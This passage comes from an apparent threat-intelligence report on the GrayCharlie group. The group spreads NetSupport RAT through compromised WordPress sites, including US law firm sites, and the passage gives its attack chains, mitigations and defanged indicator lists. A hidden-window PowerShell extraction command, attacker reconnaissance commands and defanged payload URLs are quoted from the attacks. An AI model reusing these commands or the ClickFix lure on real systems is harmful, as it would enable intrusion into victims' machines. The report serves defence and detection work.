        <h4>Staging Infrastructure</h4>
        <p>Once GrayCharlie victims land on the compromised WordPress sites, thereby satisfying the conditional logic, the payload is typically fetched from the attacker-controlled infrastructure and injected into the compromised WordPress sites. Insikt Group has identified two distinct types of staging infrastructure, each characterized by different website templates. Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”</p>
        <h5>Type 1: “Wiser University”</h5>
        <p>The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see <strong>Figure 2</strong>), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education <a href="https://themewagon.com/themes/free-bootstrap-4-html5-education-website-template-wiser/">website template</a> for school, college, and university websites. (As a sidenote, Oreshnik is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) <strong>Appendix B</strong> lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1500e0d2021b91244c59d04e70097054a1c748693.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Website impersonating “Wiser University” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h6>Suspected Testing Infrastructure</h6>
        <p>Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in <strong>Appendix B</strong>, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see <strong>Table 4</strong>). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>Date of Emergence</strong></div>
          </div>
          <div>
            <div>89[.]253[.]222[.]25</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-29</div>
          </div>
          <div>
            <div>89[.]253[.]222[.]156</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-26</div>
          </div>
          <div>
            <div>89[.]169[.]12[.]48</div>
            <div>AS207957</div>
            <div>GB</div>
            <div>2025-07-08</div>
          </div>
          <div>
            <div>185[.]231[.]245[.]158</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-06-27</div>
          </div>
          <div>
            <div>95[.]182[.]123[.]86</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-05-19</div>
          </div>
          <div>
            <div>23[.]140[.]40[.]66</div>
            <div>AS61400</div>
            <div>RU</div>
            <div>2025-04-11</div>
          </div>
          <div>
            <div>217[.]114[.]15[.]253</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-04-09</div>
          </div>
          <div>
            <div>45[.]153[.]191[.]245</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-03-21</div>
          </div>
          <div>
            <div>46[.]29[.]163[.]28</div>
            <div>AS51659</div>
            <div>RU</div>
            <div>2025-02-06</div>
          </div>
        </div>
        <p><em><strong>Table 4:</strong></em> <em>Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)</em></p>
        <h5>Type 2: “Activitar”</h5>
        <p>Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host specific websites (see <strong>Figure 3</strong>). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1156a61a7697db00d450ae4f44a3a4252c377b599.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Website impersonating “Activitar” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>A subset of domains and IP addresses associated with Type 2 is presented in <strong>Table 5</strong>. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in <strong>Table 5</strong>, <em>filmlerzltyazilimsx[.]shop</em>, is linked to the email address <em>oreshnik[@]mailum[.]com</em> through its WHOIS record.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
          </div>
          <div>
            <div>filmlerzltyazilimsx[.]shop</div>
            <div>79[.]141[.]163[.]169</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>foolowme[.]com</div>
            <div>144[.]172[.]115[.]211</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>joiner[.]best</div>
            <div>79[.]141[.]162[.]135</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>lowi1[.]com</div>
            <div>185[.]33[.]86[.]11</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>morniksell[.]com</div>
            <div>172[.]86[.]90[.]84</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>persistancejs[.]store</div>
            <div>185[.]80[.]53[.]79</div>
            <div>AS59711</div>
          </div>
          <div>
            <div>pomofight[.]com</div>
            <div>45[.]61[.]134[.]76</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>port4loms[.]com</div>
            <div>194[.]15[.]216[.]118</div>
            <div>AS197155</div>
          </div>
          <div>
            <div>signaturepl[.]com</div>
            <div>77[.]83[.]199[.]162</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>yungask[.]com</div>
            <div>91[.]193[.]19[.]220</div>
            <div>AS202015</div>
          </div>
        </div>
        <p><em><strong>Table 5:</strong></em> <em>Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)</em></p>
        <h4>Compromised Infrastructure</h4>
        <p>GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as <em>hxxps://joiner[.]best/work/original[.]js</em>), while others call a PHP file on specific endpoints <a href="https://urlscan.io/result/0199e8a3-1d07-76d2-9ccb-39ea171d3744/dom">using</a> an ID parameter (such as <em>hxxps://signaturepl[.]com/work/index[.]php?abje2LAw</em>). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. <strong>Appendix A</strong> lists a subset of WordPress websites infected by GrayCharlie.</p>
        <p>Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter <a href="https://www.wp-1click.com/blog/how-hackers-target-wordpress-sites/">remains</a> the most frequent cause of all WordPress compromises.</p>
        <h4><strong>Suspected Compromise of “Law Firm Acceleration Company” SMB Team</strong></h4>
        <p>While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at <em>hxxps://persistancejs[.]store/work/original[.]js</em> (see <strong>Table 6</strong>).</p>
        <p>Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in <strong>Table 6</strong> (see <strong>Figure 4</strong>). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain <em>persistancejs[.]store</em> first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>Company</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>SMB Team</strong></div>
          </div>
          <div>
            <div>bianchilawgroup[.]com</div>
            <div>Bianchi Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brattonlawgroup[.]com</div>
            <div>Bratton Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brighterdaylaw[.]com</div>
            <div>Brighter Day Law</div>
            <div>US</div>
            <div>N/A</div>
          </div>
          <div>
            <div>defensegroup[.]com</div>
            <div>The Defense Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>dwicriminallawcenter[.]com</div>
            <div>Benjamin Law Firm LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>fisherstonelaw[.]com</div>
            <div>Fisher Stone, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>jarrettfirm[.]com</div>
            <div>Jarrett &amp; Price LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>raineyandrainey[.]com</div>
            <div>Rainey &amp; Rainey Attorneys At Law PLLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rbbfirm[.]com</div>
            <div>Buchanan Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rmvlawyer[.]com</div>
            <div>The Law Office of Brian Simoneau, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]brentadams[.]com</div>
            <div>Brent Adams &amp; Associates</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]cfblaw[.]com</div>
            <div>Cohen Forman Barone, PC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]gerlinglaw[.]com</div>
            <div>Gerling Law Injury Attorneys</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]immigration-defense[.]com</div>
            <div>Law Offices of Daniel Shanfield</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]schwartzandschwartz[.]com</div>
            <div>Schwartz &amp; Schwartz Attorneys at Law, P.A.</div>
            <div>US</div>
            <div>N/A</div>
          </div>
        </div>
        <p><em><strong>Table 6:</strong></em> <em>Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18fd20865333f5d84a84b457d80ddd430d382877b.png?width=750&amp;format=png&amp;optimize=medium" width="1588" height="830" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ebd43f461510a56badf377e44049eaf90555a74a.png?width=750&amp;format=png&amp;optimize=medium" width="430" height="117" />
              </p>
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Website of Gerling Law Injury Attorneys (top) and SMBTeam logo (bottom) (Source:</em> <em><a href="https://urlscan.io/result/019b035c-aed8-73a6-8f38-60388c596fb6">URLScan</a>)</em></div>
          </div>
        </div>
        <p>Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.</p>
        <p>In some instances, the same compromised WordPress sites are compromised by multiple threat actors simultaneously. For example, <em>bianchilawgroup[.]com</em> was also breached by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which <a href="https://urlscan.io/result/019b027f-5214-74ff-b1e3-efec9160620d/dom">used</a> the domain <em>vimsltd[.]com</em>.</p>
        <h4>Higher-Tier Analysis</h4>
        <p>GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.</p>
        <h3>Attack-Chain Analysis</h3>
        <p>GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from <code>%AppData%</code>, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.</p>
        <h4>Attack Chain 1: Fake Browser Update Leading to NetSupport RAT</h4>
        <p>According to public reporting, when GrayCharlie first <a href="https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates">became</a> active in mid-2023, it <a href="https://www.threatdown.com/blog/smartapesg-06-11-2024/">relied</a> on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group <a href="https://infosec.exchange/@monitorsg/115363334718836118">observed</a> a return to fake browser updates as early as October 12, 2025. <strong>Figure 5</strong> provides an overview of Attack Chain 1.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ca8e19bb49da0d1924539da6e91ae9ddaf6d3227.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="475" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Attack Chain 1 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Website compromise and lure delivery</strong>. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy <code>.dat</code> files.</li>
          <li><strong>User-executed JavaScript loader</strong>. The victim manually runs the <code>.js</code> script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.</li>
          <li><strong>PowerShell staging via WScript</strong>. The JavaScript launches <code>wscript.exe</code>, which spawns <code>powershell.exe</code>. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.</li>
          <li><strong>Secondary payload retrieval</strong>. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including <code>client32.exe</code> and required DLLs.</li>
          <li><strong>File deployment and execution</strong>. The archive is extracted under the user profile (for example, <code>%AppData%\Roaming\...</code>). <code>client32.exe</code> is started in the background to minimize visible indicators to the user.</li>
          <li><strong>Persistence establishment</strong>. A Windows Run registry key is created to automatically launch <code>client32.exe</code> at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.</li>
          <li><strong>C2 readiness</strong>. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.</li>
        </ol>
        <h4>Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT</h4>
        <p>As early as April 2025, GrayCharlie <a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">began</a> using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. <strong>Figure 6</strong> provides an overview of Attack Chain 2.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ae1c0d8952cb5c0f7b8157e5acfe6511630de60c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Attack Chain 2 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Initial delivery and redirection.</strong> Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.</li>
          <li><strong>Background script and profiling.</strong> A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.</li>
          <li><strong>ClickFix fake CAPTCHA.</strong> The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see <strong>Figure 7</strong>).</li>
        </ol>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f878a544b5193108d0dd7bc5d1359a3487d5a705.png?width=750&amp;format=png&amp;optimize=medium" width="509" height="392" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Fake Captcha (Source:</em> <em><a href="https://www.elastic.co/security-labs/a-wretch-client">Elastic</a>)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Command-driven staging.</strong> The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into <code>%AppData%\Roaming\</code> (see <strong>Figure 8</strong>).</li>
        </ol>
        <div>
          <div>
            <div><code>powershell -Win^dow Style Hidden -Command "Add-Type -AssemblyName 'System. IO.Compression FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('!CF0JOAXML!','!WFHEYHKMZ!')"</code></div>
          </div>
        </div>
        <p><em><strong>Figure 8:</strong></em> <em>PowerShell command (Source:</em> <em><a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">Cybereason</a>)</em></p>
        <ol>
          <li><strong>NetSupport RAT launch and persistence.</strong> The batch file starts <code>client32.exe</code> and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.</li>
          <li><strong>Remote access and follow-on actions.</strong> Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.</li>
        </ol>
        <h3>Observed Operator Activity</h3>
        <p>In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server <em>5[.]181[.]156[.]234[:]443</em> linked to GrayCharlie within a controlled environment. Later that day, approximately three hours later, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see <strong>Figure 9</strong>).</p>
        <div>
          <div>
            <div>
              <pre><code>net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 9:</strong></em> <em>Reconnaissance commands (Source: Recorded Future)</em></p>
        <p>When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server <em>85[.]158[.]110[.]179[:]15847</em>. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix A</strong> and <strong>Appendix B</strong> to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage the Sigma, YARA, and Snort rules provided in <strong>Appendices D</strong>, <strong>E</strong>, and <strong>F</strong> in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.</li>
          <li>Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.</li>
        </ul>
        <h2>Outlook</h2>
        <p>GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.</p>
        <p>Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: Indicators of Compromise</h2>
        <div>
          <div>
            <div>
              <pre><code>Cluster 1 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]60
5[.]252[.]178[.]23
5[.]252[.]178[.]123
94[.]158[.]245[.]13
94[.]158[.]245[.]63
94[.]158[.]245[.]66
94[.]158[.]245[.]81
94[.]158[.]245[.]104
94[.]158[.]245[.]111
94[.]158[.]245[.]115
94[.]158[.]245[.]118
94[.]158[.]245[.]131
94[.]158[.]245[.]135
94[.]158[.]245[.]137
94[.]158[.]245[.]140
94[.]158[.]245[.]174
185[.]163[.]45[.]30
185[.]163[.]45[.]41
185[.]163[.]45[.]61
185[.]163[.]45[.]73
185[.]163[.]45[.]87
185[.]163[.]45[.]97
185[.]163[.]45[.]130
185[.]225[.]17[.]74
194[.]180[.]191[.]17
194[.]180[.]191[.]51
194[.]180[.]191[.]168
194[.]180[.]191[.]171
194[.]180[.]191[.]189

Cluster 2 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]9
5[.]181[.]159[.]38
5[.]181[.]159[.]112
5[.]181[.]159[.]139
5[.]181[.]159[.]140
5[.]181[.]159[.]142
5[.]181[.]159[.]143

Other NetSupport RAT C2 Servers:
5[.]181[.]156[.]234
5[.]181[.]156[.]244
5[.]181[.]159[.]29
5[.]181[.]159[.]62
5[.]252[.]177[.]15
5[.]252[.]177[.]120
5[.]252[.]178[.]35
94[.]158[.]245[.]153
94[.]158[.]245[.]170
185[.]163[.]45[.]16
194[.]180[.]191[.]18
194[.]180[.]191[.]121
194[.]180[.]191[.]209

NetSupport RAT Hashes:
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
0e9df9294c36702eee970efcb4a70b6ddb433190ab661273e2e559185c55b6c1
112bf17e7c0d0695e9229d60f0d2734c6b96d7edfb41ea3e98e518f4fb1ae6e9
11370e108c8e7a53e52f01df0829c8addb5833145618a7701fbedbb1d837a43d
15dfe9d443027ba01b8f54f415fd74d373b3a06017db8ef110fb55b33357b190
16c8b5e10135d168d73a553a4bda51628e5b4fd419c0ecd47ca4cd7aa864ebd5
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
1900ca9b482273df3127e221526023c025808d8fd65769a418fe1f346e7d41e2
1c389bf1859a00c58b6a97c02fc26c2fe9766c43e06242a94e92b6585b62398b
21a24922b29742977c4f7e25dd2be056dc02bc5e70c98e32ec3e0c6206f4d9ef
312a0e4db34a40cb95ba1fac8bf87deb45d0c5f048d38ac65eb060273b07df67
31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c
31f69d67eca6f3fc837e8d10dff4e2fb6643e33c118cff87df4fee2b183bf0e0
37e8b57ff4d724053b1917dc6edaca0708d44ceecd00cab7e4cabb336c2868d7
3ac57bea954ce68dc937f6954ae8a6a19a367a579aeeda7cc93ddd5968fae250
3ada20fbd80ec7f536db8303a5fa029af741a6914de61376ac8f81ac3ac728fd
3b5658532bc4058131689c5641def85d7ae25d5b837d3d1aff3af7bb25581f17
3c499faac4b973c237670f046973691a245ecd735ffebcca3e93337d94b71cde
3c4b87be8450e3120b7ad2b11ff59850950beb39906dc1636b3ee7b6390f2086
4732f025a2a69f6c40787854c5da122689702f00f4f423061bb30ab7fa1e98d3
5381b2a7a77448c4908f5c79d21631f56c88ead0365981cac1dcaafe493c313e
53e9511401000f61c9d910b92cd6d5a58e38ae541975135944885e53fa91ecb7
5dfbd8cf98ebd4977d4f240dcabd5cd67b936c0095c2d5b9a77896daea877df6
5eebdb584a1acd6aacc36c59c22ec51bbd077d2dbbe0890b52e62fa6fb9cf784
5ff742e134e3d17ec7abea435f718e8f5603b95e7984e024b2310ac9ef862ddf
60ff43424c0ba9dc259ab32405345ef325a4cb4d0baf0c0b0c13f9d3672e99eb
68c6411cc9afa68047641932530cf7201f17029167d4811375f1458cae32c7bd
6b2c41b42f75e64d435ba56c2f2b6d79a11b862a2d994487dab3e51e298bc5c9
6b93b7372941a09f1ea69f8b71c5c4e211ea0f8a24061e702002ca84457bcddd
6d0857a9c77f9c5f2a5e6921e1cb9f7e1a5d6b947ad63b364d291157d3f840fb
70f3a6fdbbc5e2ae79c28b48b6478ee3c8ea6f2b705ca9dc9bf8e63a4f6e0c8d
72baf2ecb0a9df607e54b64c0925ffc6739ab5a8b18900bf5c1930bcc799395d
748d546c6db44f6aa4bbb8e586d79f56c63fa87580eb19a0f2d5079cbe0952b7
79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89
797ae2dbb2c538710fefe75dbe380b9f55b614cb03c4ae09bb3172e8234dd9d9
7a73ae8cca6ce6fa88f89d6154811cb453d6e6db9fa8ed5fbdaf8895aae601a5
7b19538dcf6d4bb84590c458f09c5707c8db53a42861fa56533c49c1a3acd953
7e3634bfd66e601d7585b237437f11f7d614b33705ba5f7bd75ab176c8250d38
858dfa529b960c6f6226b53beb55ba1900d3f498ba7be40724ed5c16d7d5a44b
871e5629d9c8898babf3ed579586e3f5f94a6c4623d3a0a7f9a99bf9d95ffc7b
8763749fd09245e7fa8c0ee2cc797d5520a9ef5d6846f044a0cd7c969c4bd7d4
89d839bbdc786c006304f3c6c6939150380aaa9e84d82bc31cdf0cf7609a6243
8b21fbd40c89763f51d5e06680c0971623500f4724c25958446bac794797057b
8baebd525324297faf86639266060172ded963767c832a609a991fa92c8463ab
8d1ed904d90e08048f42cdc9a25c2159f0f8dc4aa9dc01b0207645ea53abe189
957ab8417606ad41ad31f006d997af3f647dd5215af899551d08b3b472a4bc85
a0332fe0baa316fe793e757f9cf5938b099e97dc4624ead6f3bad8555c8a419b
a1482e62ecc89696a75adea7052c2e98a75c9d37304723abd110d60962bafdb7
a28d0c82a2a37462c2975b5eda7f91e8fc3c2ed50abfe357948ec4faabbd4951
a6637685091835826e62af279cc6c648188797f9edc05a2399a6686349102774
a6f1f68827303e655488c8d54b3be3ce8b1097f3ff374a2e4bc82ff96812781c
abc5b2118bc1d8c82f3726a5e30cf22ae3fa1c572dd3327b281ea6fd97ae9c06
afc45cc0df7f7e481bff45c6f62a6418b6ae4c8b474ec36113e05ab7ca7e2743
b1f91355a8472e364e07f05dc69bbd9c74dc1943e9c4475f46c2b448bb6d6e5d
b2b7218c3f649b9077510aac309357e884c314e0f488abed391415defb249f4c
b6b685fe020c481161060df9dbef0fc205cde479056c18aaeae184daa3f8a9c0
b784301cb2edafea875f779cf24e018f06732561069f6c4c3d86548029671642
ba557bd6b2c1d3297b2c9bd7294e47b9ad9ec6a937cddc879dd563c61a9abcbd
bb451151e52f0868f98e32d26ffa7c2be412b47cd470bf90d3cfe777b4a19f85
bd39f32177dc7a20f5087c5460ebf589035d9051336c69f07a26398f76aec40e
bf37542e9eb7a3b2f51d107e56d7551e6248f06ce18918e3dda2ebe9da1b0e80
bf97c4ff35b5e2c039aa1f1a9a164b7ec4d9339a631c84910b9a4d03b7927b8a
c2ba0018de8dcf0abfb2669cce95ed09377e9a9da7ff8e74e95688c99a025634
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
c441afb337c4803eed20ae255fbad3cdfac2800475c51e00a55369909efb4c89
cc6ad344d30178e04e49ab16cd43744925676562aded051835fb3f73401f31fa
ceab18331f785d0bf215f551b90f00567e36d339ba8e3ed8e45c0ad410b25808
d02a1eb597c66b602ac7d55095f771345ff5e90905ea12e523df2095030752b6
d6142f48664208710bab9fcab8dfcda66ad75ad756d2ce9c3aa243dcbc29bf4a
d665a8547baf067f2216821ecd4145eab1c75868f024d09140fb265b819d5194
d8d2092e174240d7bac63a9e1c199b442e1cb0f39d7fa32510b1aa7717c3ae38
e24de02415946133176b66017d54a5dcd7270c83f5ef01d79faff4e64d13c63b
e5502722c2bb84876903549445534c47cdaa586a0bb1e5b3a53162d75cc6cb28
e66ae0ac443b5140a1b35b5aaa6899eea296d9d633988eb044a395a34a887431
e92e01977d85f6834f57bd09e29e654b10da798844e4a64470cb22dac78bef93
e9723a2a9ca45787c35b864605a6be71ccf12b2d96dad8e7fc39117f7ba29abb
f28bb7bc5c801d5444ba6816e3a91d5bfaf0307578b7a1529415fc220fd9e9e8
f86b6aa11a276c24dd80db48f43c8a2f0c8df6e5426a7a0fee322c0427421ebb

“Type 1” Staging Server IP Addresses:
77[.]83[.]199[.]3
77[.]83[.]199[.]15
77[.]83[.]199[.]31
77[.]83[.]199[.]42
77[.]83[.]199[.]73
77[.]83[.]199[.]82
77[.]83[.]199[.]88
77[.]83[.]199[.]90
77[.]83[.]199[.]112
77[.]83[.]199[.]123
77[.]83[.]199[.]132
77[.]83[.]199[.]142
77[.]83[.]199[.]170
79[.]141[.]160[.]24
79[.]141[.]160[.]34
79[.]141[.]161[.]50
79[.]141[.]161[.]171
79[.]141[.]162[.]35
79[.]141[.]162[.]37
79[.]141[.]162[.]50
79[.]141[.]162[.]132
79[.]141[.]162[.]149
79[.]141[.]162[.]169
79[.]141[.]162[.]177
79[.]141[.]162[.]181
79[.]141[.]162[.]187
79[.]141[.]162[.]204
79[.]141[.]162[.]229
79[.]141[.]163[.]138
79[.]141[.]163[.]176
79[.]141[.]172[.]204
79[.]141[.]172[.]223
79[.]141[.]172[.]229
79[.]141[.]172[.]232
79[.]141[.]172[.]240
79[.]141[.]173[.]60
79[.]141[.]173[.]161
79[.]141[.]173[.]168
85[.]158[.]111[.]29
85[.]158[.]111[.]38
85[.]158[.]111[.]53
85[.]158[.]111[.]75
85[.]158[.]111[.]81
85[.]158[.]111[.]126
89[.]46[.]38[.]34
89[.]46[.]38[.]48
89[.]46[.]38[.]88
89[.]169[.]12[.]48
91[.]193[.]19[.]32
91[.]193[.]19[.]64
91[.]193[.]19[.]78
91[.]193[.]19[.]127
